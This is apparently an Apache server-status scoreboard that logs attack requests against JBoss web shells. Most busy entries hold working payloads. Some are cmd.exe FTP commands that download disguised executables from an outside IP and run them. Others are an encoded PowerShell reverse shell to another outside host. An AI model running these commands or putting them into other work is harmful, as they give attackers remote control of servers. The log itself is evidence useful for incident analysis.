| S | 3226918269 ms | 0 KB | 0 KB | 192.3.194.202 | 81.45.140.46 | GET /jbossass/jbossass.jsp?ppp=cmd.exe+%2Fc+%40echo+open+89.34.27.167%3Ekisols.txt%26%40echo+binary%3E%3Ekisols.txt%26%40echo+get+%2Fopenvpn.exe+C%3A%5CWindows%5CTemp%5Copenvpn.exe%3E%3Ekisols.txt%26%40echo+quit%3E%3Ekisols.txt%26%40ftp+-s%3Akisols.txt+-v+-A%26%40start+C%3A%5CWindows%5CTemp%5Copenvpn.exe HTTP/1.1 |
| R | ? | ? | ? | ? | ? | ? |
| R | ? | ? | ? | ? | ? | ? |
| S | 91919766 ms | 0 KB | 0 KB | 104.200.67.3 | 81.45.140.46 | GET /jexws4/jexws4.jsp?ppp=powershell+-e+JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwADQALgAyADAAMAAuADYANwAuADMAIgAsADYAMQAxADcAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA HTTP/1.1 |
| R | ? | ? | ? | ? | ? | ? |
| S | 24428776 ms | 0 KB | 0 KB | 104.200.67.3 | 81.45.140.46 | GET /jexws4/jexws4.jsp?ppp=powershell+-e+JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwADQALgAyADAAMAAuADYANwAuADMAIgAsADYAMQAxADcAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA HTTP/1.1 |
| S | 23895841 ms | 0 KB | 0 KB | 104.200.67.3 | 81.45.140.46 | GET /jexws4/jexws4.jsp?ppp=powershell+-e+JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwADQALgAyADAAMAAuADYANwAuADMAIgAsADYAMQAxADcAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA HTTP/1.1 |
| R | ? | ? | ? | ? | ? | ? |
| R | ? | ? | ? | ? | ? | ? |
| R | ? | ? | ? | ? | ? | ? |
| R | ? | ? | ? | ? | ? | ? |
| R | ? | ? | ? | ? | ? | ? |
| R | ? | ? | ? | ? | ? | ? |
| R | ? | ? | ? | ? | ? | ? |
| S | 96715018 ms | 0 KB | 0 KB | 104.200.67.3 | 81.45.140.46 | GET /jexws4/jexws4.jsp?ppp=powershell+-e+JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwADQALgAyADAAMAAuADYANwAuADMAIgAsADYAMQAxADcAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA HTTP/1.1 |
| R | ? | ? | ? | ? | ? | ? |
| R | ? | ? | ? | ? | ? | ? |
| R | ? | ? | ? | ? | ? | ? |
| R | ? | ? | ? | ? | ? | ? |
| R | ? | ? | ? | ? | ? | ? |
| R | ? | ? | ? | ? | ? | ? |
| R | ? | ? | ? | ? | ? | ? |
| R | ? | ? | ? | ? | ? | ? |
| R | ? | ? | ? | ? | ? | ? |
| R | ? | ? | ? | ? | ? | ? |
| R | ? | ? | ? | ? | ? | ? |
| R | ? | ? | ? | ? | ? | ? |
| R | ? | ? | ? | ? | ? | ? |
| S | 527159448 ms | 0 KB | 0 KB | 31.192.104.157 | 81.45.140.46 | GET /jbossass/jbossass.jsp?ppp=cmd.exe+%2Fc+%40echo+open+89.34.27.167%3Ecksadt.txt%26%40echo+binary%3E%3Ecksadt.txt%26%40echo+get+%2Fwinscp1.3.exe+C%3A%5CWindows%5CTemp%5Cwinscp1.3.exe%3E%3Ecksadt.txt%26%40echo+quit%3E%3Ecksadt.txt%26%40ftp+-s%3Acksadt.txt+-v+-A%26%40start+winscp1.3.exe HTTP/1.1 |
P: Parse and prepare request S: Service F: Finishing R: Ready K: Keepalive